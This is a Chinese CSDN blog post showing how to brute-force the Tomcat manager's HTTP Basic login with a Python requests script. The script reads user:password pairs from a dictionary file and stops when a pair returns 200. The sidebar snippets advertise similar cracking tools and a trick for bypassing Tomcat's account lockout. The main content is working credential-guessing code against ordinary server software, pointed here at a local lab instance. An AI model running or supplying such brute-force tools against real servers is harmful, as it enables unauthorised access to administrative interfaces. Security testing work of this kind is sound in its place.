使用python3对tomcat后台爆破

最新推荐文章于 2024-04-21 23:55:54 发布
最新推荐文章于 2024-04-21 23:55:54 发布
阅读量965 收藏 3
点赞数
分类专栏: tomcat python 文章标签: tomcat 爆破 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35492650/article/details/102784287
版权

tomcat后台的地址是
http://127.0.0.1:8080/manager/html
通过谷歌游览器的无痕窗口检查分析,发现请求头的
Authorization: Basic YWRtaW46MTIzNA==可能是用户名和密码
tomcat对用户名和密码进行了加密,根据等号,加密算法可能是base64
对YWRtaW46MTIzNA==进行base64解密,发现是用户名:密码

admin:1234

在这里插入图片描述
使用python3 的requests模块对tomcat后台进行爆破

import requests
import base64

url = "http://127.0.0.1:8080/manager/html"
with open("dict.txt", "r") as f:
    while 1:
    	# 取出字典中的用户名和密码
        passwd = f.readline()[:-1]
        # 如果为空,dick.txt文件的最后一行,退出运行
        if passwd == "":
            break
        # 对用户名和密码进行base64加密
        Authorization = "Basic " + base64.b64encode(passwd.encode("utf-8")).decode("utf-8")
        headers = {
            "Authorization": Authorization
        }
        response = requests.get(url, headers=headers)
        print(response.status_code)
        # 根据返回的状态码,判断用户名和密码是否正确
        if response.status_code == 200:
            print("success")
            print("用户名:密码" + passwd)
            break

dict.txt 内容如下

tomcat:1234
admin:1234
二之一
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信息安全技术(二)—使用Metasploit爆破Tomcat密码
yi23456qi的博客
05-29 780
Metasploit Framework (MSF) 是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
信息安全技术(二)—— 使用Metasploit爆破Tomcat密码
2201_75757066的博客
05-31 657
通过本次实验,默认情况下,tomcat服务会开启在8080端口,管理界面目录在/manager/html,知道了metasploit功能的强大性,使用metasploit某个模块对tomcat管理界面实施密码暴力破解攻击以获得一个管理器的访问权限。当我们在做实验的时候,不只是验证一些漏洞和简单的进行渗透测试,更多方面是让我们能够有意识到网络安全问题无处不在,我们都有可能是被进行渗透攻击的那群人,从这门课程《信息安全技术二》中,让我们更多的知道了网络安全意识的重要性。
python 破解wp博客后台登陆密码
rocky的专栏
05-24 2302
当时自己架设wp的时候发现默认居然没有验证码,于是写了个小脚本,跑了下。 居然还拿到不少后台。 惊 代码:python 暴力破解wordpress博客后台登陆密码 (上面只是截取了一个本地的)
python脚本7-爆破woniusales
m0_61786761的博客
09-21 301
【代码】python脚本7-爆破woniusales。
Tomcat弱口令及war包漏洞复现(保姆级教程)
最新发布
m0_69043895的博客
04-21 1459
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Tomcat 认证爆破
qq_33441500的博客
07-15 2739
0x01 tomcat 认证爆破 我们实战遇到tomcat的站 首先会去看看管理登录是否存在弱密码 我们遇到了呢 我就本地搭建环境复现记录一下过程 打开目标网站,进行端口扫描发现开放了 8080端口打开看看呢 嗯是的 tomcat中间件 随手一个manager 弹框出现认证窗口输入账号密码 那我们使用burpsuite 爆破下呢 我们随便输入账号密码 0x02 抓包爆破 从包内的信...
python脚本监控Tomcat服务器的方法
09-20
通过这种方式,Python脚本与`cron`的结合实现了对Tomcat服务器的简单而有效的监控。这种方法适用于小型系统或开发环境,无需部署复杂的监控系统,但也能确保及时发现和处理服务异常。对于大型生产环境,可能还需要...
基于FastAPI和Vue3的Python管理后台设计源码
03-29
该项目是一个快速开发的管理后台,采用了流行的技术栈,包括Python3、FastAPI、Vue3、vite2和Element Plus1.2(ElementUI)。适合用于个人学习和实践Python、JavaScript、Vue、CSS、TypeScript和HTML的开发技术。
python之——使用python编写爆破脚本
12-21
dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url=...
python制作企业邮箱的爆破脚本
12-23
总结来说,这个Python脚本通过`poplib`模块实现了对企业邮箱的POP3认证爆破使用了多线程并结合文件输入来提高爆破速度。在实际环境中,此类脚本可能用于安全审计,以评估系统的账户安全性。但请务必谨慎使用,遵循...
Python3对股票数据进行分析源代码和股票数据集
04-09
1、内容概要:本资源主要包括Python3对股票数据进行分析源代码、Python3对股票的收益和风险分析源代码、Python3对多股票的投资组合进行分析源代码、北京某投资管理有限公司20支真实股票数据、20支股票整体绘图分析...
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
tomcat暴破图形化---绕过tomcat 6/7/8的防暴破机制
12-19
tomcat 6/7/8 自带防暴力破解机制,通过塞满cache,挤出已锁定账号,实现完美绕过。
Tomcat弱口令利用工具
09-03
Tomcat弱口令利用工具,很好用的工具
使用burp对Tomcat 弱密码爆破
yggcwhat
08-18 2426
使用burp对Tomcat 弱密码爆破
python 写的http后台弱口令爆破工具
byteway的专栏
12-12 6178
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
Tomcat爆破
HeTuiPei的博客
08-21 567
把输入的账户和密码包起来 选择第三个模式 第一个添加用户名 第二个添加: 第三个添加密码 选择编码格式 取消打钩 点击爆破
Java:tomcat 项目部署方法
程序员闪充宝
12-17 265
点击上面  免费订阅本账号!本公众号主要推送javaweb开发相关技术,基础知识点,同时会深入剖析复杂的问题,分享一些优秀的框架,大型项目经验,当今最流行的Javaweb技术,热点科技新...
tomcat管理界面弱口令扫描
08-30 4356
关于tomcat弱口令扫描问题,应当注意两点。第一是版本问题。 在tomcat6及6之前,是可以直接暴力破解的。 抓一下tomcat登陆管理界面的数据包,可以看出,其认证方式是在http的请求header中添加一个字段为 Authorization,这个字段的值是 “Basic base64(username:password)”,因此在暴力破解时,只需要在请求包中添加该字段即可。 在tom...
使用Python boto3操作S3对象存储实战指南
"这篇文档介绍了如何在Python使用AWS的S3 SDK,即boto3,来进行对象存储操作。提供了安装、卸载SDK的方法,以及快速入门的示例,包括查看Bucket列表、上传和下载文件等基本操作。" 在Python中,boto3是一个强大的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值